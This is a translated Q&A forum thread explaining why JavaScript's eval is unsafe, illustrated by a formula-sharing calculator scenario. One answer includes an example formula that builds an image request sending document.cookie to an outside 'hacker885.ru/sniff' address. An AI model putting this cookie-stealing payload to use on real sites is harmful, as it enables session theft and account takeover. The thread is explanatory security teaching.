Why is using "eval" in JavaScript considered unsafe?
In the world of JavaScript developers, there is a well-established phrase:
"Eval is evil" (eval is evil)
Why and in what cases is the use of eval in JavaScript unsafe? If JavaScript is executed on the client side, how can an attacker hack the site?
The standard developer tools of many browsers allow you to execute the code: anyone can execute JavaScript code, for example, in the browser Google Chrome by entering this code in the console.
That is, as it seems to me (superficially), the only thing that an attacker can do is to harm himself, because only he can see all his changes. However, there is an opinion that eval can be used to steal the personal data of other users? What is the mechanism?
Why are eval considered unsafe methods? If anyone knows what specific threat this method can bring, please describe the situation and provide an example code.
2 answers
Well, look. Let's say we wrote a calculator in which you can register and exchange formulas (i.e. the server part where at least user credentials are stored). The attacker's goal is to gain access to the users account, or the administrator of this resource.
The calculator itself works like this: when you press any numeric or mathematical operations key, we add it to the line expr, as a result we have it turns out:
expr = '5 + 2 * 3';
When we press the " = " sign, {[4] is executed]}:
var result = eval(expr);
Hacking stage: If an attacker sends a formula where, in addition to the mathematical content, there will be javascript code, then the person to whom it will be sent will launch a malicious script along with the formula. The formula obtained from the attacker may look like this:
expr = '(document.createElement("img")).src="http://hacker885.ru/sniff?c=" + document.cookie, 5 + 2 * 3';
As a result, : an attacker will be able to: get cookies, access local/session storage, to the content of the page, will try to download something (for example, a virus).
Plus: If this way we send this message to the resource administrator, then thanks to the rights we have received, we may be able to get to the resource backend.
In place of the calculator, there may be something more weighty: for example, an e-learning portal.
Something like that)
P.s.
A little off-topic, but I want to touch on it because it meets.
To be honest, finding a problem where it would really be necessary to use eval is difficult, everything that I came across was related to the similarity of a calculator or a visualizer of mathematical formulas.
I can say that if you want to write a parse of mathematical expressions is not difficult. In my spare time, I sketched a parser like this: http://jsfiddle.net/kadymov/6d79wmfg/4/ . It is a little unfinished, but it is already working, and it takes 150 lines.
Use specific ones tools for specific tasks, and eval, if left anywhere, is only at the prototype stage.
- Eval of verified data is not harmful in terms of security.
- Not all the data that seems to be verified is such.
For example, the server may send something written by another user that contains a malicious script. Or the parameters can be taken from the address, or even from its hash fragment. The transition to such a page will be made by a simple link, and the code of the person who posted the link will be executed on the page of your domain. - Eval reduces performance. And modern browsers are very focused on optimization, almost to the level of compilation into native code.
One direct call to eval and that's the end of it.
Any function that contains a direct eval call cannot be optimized by the browser, because the code is executed in its context. It will have to retain access to all variables higher up the chain of closures, quite possibly extending the life of what should have been collected by the collector. garbage. - An indirect eval call executes code in a global context.
A common use case is getting a global object.
- In most cases, the eval call can be replaced with a new Function.
-
Why would you want to use eval?
It is very likely that there is a better option for this.